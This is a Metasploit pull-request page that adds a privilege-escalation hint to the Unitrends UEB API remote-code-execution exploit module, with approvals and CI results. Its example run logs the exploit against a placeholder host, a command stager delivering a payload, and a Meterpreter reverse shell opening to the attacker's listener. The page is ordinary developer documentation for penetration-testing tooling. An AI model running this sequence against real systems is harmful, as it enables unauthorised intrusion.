ueb priv esc suggestion #11223

Merged
merged 1 commit into from Jan 10, 2019

h00die commented Jan 10, 2019

This PR adds an LPE suggestion to the UEB module.
Suggestion from: #10952 (comment)
Using the text from: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb#L258

Example run:

msf5 > use exploit/linux/http/ueb_api_rce 
msf5 exploit(linux/http/ueb_api_rce) > set target 1
target => 1
msf5 exploit(linux/http/ueb_api_rce) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 exploit(linux/http/ueb_api_rce) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf5 exploit(linux/http/ueb_api_rce) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:443 - Sending requests to UEB...
[*] Command Stager progress -  19.76% done (164/830 bytes)
[*] Command Stager progress -  39.16% done (325/830 bytes)
[*] Command Stager progress -  56.87% done (472/830 bytes)
[*] Command Stager progress -  74.82% done (621/830 bytes)
[*] Command Stager progress -  92.77% done (770/830 bytes)
[*] Command Stager progress - 110.48% done (917/830 bytes)
[*] Sending stage (914728 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:38760) at 2019-01-09 20:27:06 -0500
[+] A privilege escalation exploit can be found 'exploits/linux/local/ueb_bpserverd_privesc'
[*] Command Stager progress - 126.63% done (1051/830 bytes)

meterpreter > exit

Notice the new suggestion at the end!

h00die added the easy label Jan 10, 2019

bcoles approved these changes Jan 10, 2019

wchen-r7 merged commit 74330f8 into rapid7:master Jan 10, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

msjenkins-r7 added a commit that referenced this pull request Jan 10, 2019

Land #11223 - ueb priv esc suggestion
ueb priv esc suggestion.

h00die deleted the h00die:ueb_recommend branch Jan 14, 2019
